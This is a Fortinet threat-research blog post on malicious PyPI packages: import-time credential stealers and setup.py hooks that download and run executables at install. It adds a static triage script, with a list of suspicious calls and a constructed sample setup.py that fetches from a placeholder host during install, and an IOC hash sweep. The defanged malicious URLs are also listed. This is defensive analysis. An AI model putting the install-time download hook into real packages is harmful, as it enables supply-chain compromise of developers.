FortiGuard AI Detects Malicious Packages Hidden in the Python Package Index
2023-08-14 23:00:00 Author: feeds.fortinet.com

Python Package Index (PyPI) packages have become a common way for threat actors to post malware that unsuspecting victims may download. The FortiGuard Labs team has been monitoring this attack vector for some time and, earlier this year, began posting a monthly update of the malicious packages we have discovered. Recently, we introduced a new AI engine to our OSS supply chain threat-hunting system, and with its assistance we have already discovered several new malicious PyPI attacks. A short preview of the AI engine's detections is shown below.

This report looks at two sets of malicious PyPI packages published in early July. We have bundled them together by author to demonstrate how it is common for the same author to release several similar or even identical malicious packages using different PyPI account IDs. For example, the packages in the first set were written by a threat actor who goes by the handle Josef M and uses the email address “[email protected].” The second set was written by an author with the PyPI ID “killskids.”

The First Set of Packages

  • pycolouringsextV1 (version 1.1.0)
  • sysfontstoolV1 (version 1.1.0)
  • syscoloringsaddition (version 1.1.0)
  • pitutil (version 1.0.0)
  • syssqlitedbmodules (version 1.1.0)

These packages all had a similar project page style, as shown below:

Let’s look at one of the packages, “syssqlitedbmodules.” The first thing we notice in its __init__.py is a long string of encrypted code that is decrypted and run when the module is imported.

After decryption, we can see that this is a stealer, similar to the one we analyzed in a previous blog. It tries to steal information such as credit card details, wallets, and account logins, and sends it out through a Discord webhook.

The Second Set of Packages

  • killskids-auth (versions 1.0.5, 2.0.0)
  • testpackageforyoutube (version 1.0.0)

The setup.py in these packages defines custom cmdclass commands, which setuptools runs during package installation, as shown below.

We can see that this setup.py tries to connect to a URL to download a potentially malicious executable file and run it. However, the payload for this package was unavailable at the time of our writing.
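Both shapes described above (an encoded blob handed to exec() in __init__.py, and a setup.py that overrides cmdclass so its own code runs at install time) can be triaged statically, without ever importing or installing the package. The following script is an added example for this post, not FortiGuard tooling; the lists of suspicious callees and the two sample files are constructed for illustration and are only parsed, never executed.

```python
"""Static triage of a PyPI package's __init__.py and setup.py for the two shapes
described above: an encoded blob handed to exec() at import time, and a setup.py
that overrides cmdclass so its own code runs during installation.
Added example; not FortiGuard code."""
import ast
import base64
import textwrap

# Fully qualified callees worth a closer look when they appear in package metadata
# or an __init__.py.  Hypothetical, deliberately small list for this example.
SUSPICIOUS_CALLS = {
    "exec", "eval",
    "base64.b64decode", "zlib.decompress", "marshal.loads",
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post",
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "os.system", "os.startfile",
}
# Bare names that still count when imported with `from x import y`.
SUSPICIOUS_TAILS = {"exec", "eval", "b64decode", "urlopen", "urlretrieve", "Popen", "startfile"}
LONG_LITERAL = 200  # a string constant this long in an __init__.py is unusual


def _dotted(node: ast.expr) -> str:
    """Render a Name/Attribute chain such as urllib.request.urlopen as a dotted string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def triage_source(filename: str, source: str) -> list[str]:
    """Return human-readable findings for one Python source file (no code is executed)."""
    findings = []
    tree = ast.parse(source, filename=filename)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            callee = _dotted(node.func)
            # setup(cmdclass={...}) replaces the install/develop commands with arbitrary code.
            if callee == "setup":
                for kw in node.keywords:
                    if kw.arg == "cmdclass":
                        findings.append(f"{filename}: setup() overrides cmdclass at line {node.lineno}")
            if callee in SUSPICIOUS_CALLS or callee.rsplit(".", 1)[-1] in SUSPICIOUS_TAILS:
                findings.append(f"{filename}: suspicious call {callee}() at line {node.lineno}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) and len(node.value) >= LONG_LITERAL:
            findings.append(f"{filename}: {len(node.value)}-char string literal at line {node.lineno}")
    return findings


# Constructed samples shaped like the packages discussed; they are only parsed, never
# executed, and the URL is a placeholder.
SAMPLE_SETUP = textwrap.dedent("""
    from setuptools import setup
    from setuptools.command.install import install
    import urllib.request

    class PostInstall(install):
        def run(self):
            install.run(self)
            urllib.request.urlretrieve("https://example.invalid/placeholder", "placeholder")

    setup(name="demo", version="1.0.0", cmdclass={"install": PostInstall})
""")

_BLOB = base64.b64encode(b"print('constructed placeholder')" * 16).decode()
SAMPLE_INIT = f"import base64\nexec(base64.b64decode('{_BLOB}'))\n"


if __name__ == "__main__":
    for name, src in (("setup.py", SAMPLE_SETUP), ("__init__.py", SAMPLE_INIT)):
        for finding in triage_source(name, src):
            print(finding)
```

Run it against the files of a downloaded sdist or wheel before installing. A cmdclass override is not malicious on its own (plenty of legitimate packages compile extensions that way), so treat the findings as triage prompts for manual review rather than verdicts.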

Conclusion

This blog shows that the same author often uses different PyPI IDs when posting their malicious packages. This is likely an attempt to spread their malware as widely as possible before it is taken down. Reusing similar code across packages lets malware authors distribute new packages quickly while extending the malware's shelf life. Discovering new OSS threats hidden in millions of packages is like looking for a needle in a haystack. Our new AI engine performs far better than traditional approaches, discovering threats in near real time to protect organizations from malicious threat actors lying in wait.

Fortinet Protections

FortiGuard AntiVirus detects the malicious files identified in this report as:

pycolouringsextV1-1.1.0 __init__.py: Python/Agent.TENR!tr

sysfontstoolV1-1.1.0 __init__.py: Python/Agent.TENR!tr

syscoloringsaddition-1.1.0 __init__.py: Python/Agent.TENR!tr

pitutil-1.0.0 __init__.py: Python/Agent.TENR!tr

syssqlitedbmodules-1.1.0 __init__.py: Python/Agent.TENR!tr

killskids-auth-1.0.5 setup.py: Python/Agent.SDIK!tr

killskids-auth-2.0.0 setup.py: Python/Agent.SDIK!tr

testpackageforyoutube-1.0.0 setup.py: Python/Agent.SDIK!tr

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects and blocks the download URLs cited in this report as Malicious.

The FortiDevSec SCA scanner detects malicious packages, including those cited in this report, when they appear as dependencies in users' projects during the test phase, and prevents those dependencies from being introduced into users' products.

If you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.

IOCs

pycolouringsextV1-1.1.0 __init__.py: 475e15da18cd785eb079981585a6519b

sysfontstoolV1-1.1.0 __init__.py: 475e15da18cd785eb079981585a6519b

syscoloringsaddition-1.1.0 __init__.py: 188a8e8f9afb0423276cbe92f8846c47

pitutil-1.0.0 __init__.py: f658a9d876041b6434d073d883c72865

syssqlitedbmodules-1.1.0 __init__.py: 188a8e8f9afb0423276cbe92f8846c47

killskids-auth-1.0.5 setup.py: d643d5f2e8631bcb831e3e79d198a061

killskids-auth-2.0.0 setup.py: 9286d9ad57a21c49a06dac2fb7f463ba

testpackageforyoutube-1.0.0 setup.py: 9c8cbdc00c745407198863372d5ca06c

Malicious URLs

hxxps://github[.]com/killskids/test/raw/main/calc[.]exe
hxxps://github[.]com/killskids/test/raw/main/auth-server[.]exe
hxxps://file[.]io/IWbO1KYBw4Bn
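The IOC list above can be turned directly into a sweep of an environment's site-packages directory. The script below is an added example written for this post, not a FortiGuard tool: the MD5 table and package names are copied from the IOC section, the directory-name check is a heuristic (installed directory names do not always equal project names), and self_check() builds a throwaway tree with a constructed file so the sweep can be exercised without a real infection.

```python
"""Sweep a directory tree for the __init__.py / setup.py files and package names
listed in the IOC section above.  Added example; not FortiGuard tooling."""
import hashlib
import os
import sys
import sysconfig
import tempfile

# MD5 values and file names copied from the blog's IOC list.
IOC_MD5 = {
    "475e15da18cd785eb079981585a6519b": "pycolouringsextV1 / sysfontstoolV1 __init__.py",
    "188a8e8f9afb0423276cbe92f8846c47": "syscoloringsaddition / syssqlitedbmodules __init__.py",
    "f658a9d876041b6434d073d883c72865": "pitutil __init__.py",
    "d643d5f2e8631bcb831e3e79d198a061": "killskids-auth-1.0.5 setup.py",
    "9286d9ad57a21c49a06dac2fb7f463ba": "killskids-auth-2.0.0 setup.py",
    "9c8cbdc00c745407198863372d5ca06c": "testpackageforyoutube setup.py",
}
# Package names from the blog; matching an installed directory name is a heuristic.
IOC_NAMES = {
    "pycolouringsextV1", "sysfontstoolV1", "syscoloringsaddition", "pitutil",
    "syssqlitedbmodules", "killskids-auth", "testpackageforyoutube",
}


def md5_of(path: str) -> str:
    """Hex MD5 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _norm(name: str) -> str:
    # PyPI project names are case-insensitive and '-' and '_' are interchangeable.
    return name.lower().replace("-", "_")


def sweep(root: str, iocs=IOC_MD5, names=IOC_NAMES) -> list[tuple[str, str]]:
    """Return (path, reason) pairs: directories named like a listed package, and
    __init__.py / setup.py files whose MD5 appears in the IOC table."""
    hits = []
    wanted = {_norm(n) for n in names}
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if _norm(d) in wanted:
                hits.append((os.path.join(dirpath, d), "directory name matches IOC package list"))
        for fn in filenames:
            if fn not in ("__init__.py", "setup.py"):
                continue  # the IOCs only name these two file types
            path = os.path.join(dirpath, fn)
            digest = md5_of(path)
            if digest in iocs:
                hits.append((path, f"MD5 {digest} = {iocs[digest]}"))
    return hits


def self_check() -> dict:
    """Exercise sweep() on a throwaway tree: a directory named after a listed package
    containing a constructed setup.py, whose own hash is added to a copy of the IOC table."""
    with tempfile.TemporaryDirectory() as tmp:
        pkg = os.path.join(tmp, "pitutil")
        os.makedirs(pkg)
        sample = os.path.join(pkg, "setup.py")
        with open(sample, "w") as fh:
            fh.write("# constructed sample, not the real package\n")
        with open(os.path.join(tmp, "notes.txt"), "w") as fh:
            fh.write("unrelated file, never hashed\n")
        iocs = dict(IOC_MD5)
        iocs[md5_of(sample)] = "constructed sample"
        return {"hits": sweep(tmp, iocs), "real_table_hits": len(sweep(tmp))}


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else sysconfig.get_paths()["purelib"]
    for path, reason in sweep(target):
        print(path, reason)
```

With no argument the script sweeps the current interpreter's purelib directory; pass a path to check another environment or an extracted sdist. Because the first set's packages share only two distinct hashes, a hash match identifies the payload family rather than the exact package name, which is why the table keeps both names per entry.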


Source: https://feeds.fortinet.com/~/790373219/0/fortinet/blog/threat-research~FortiGuard-AI-Detects-Malicious-Packages-Hidden-in-the-Python-Package-Index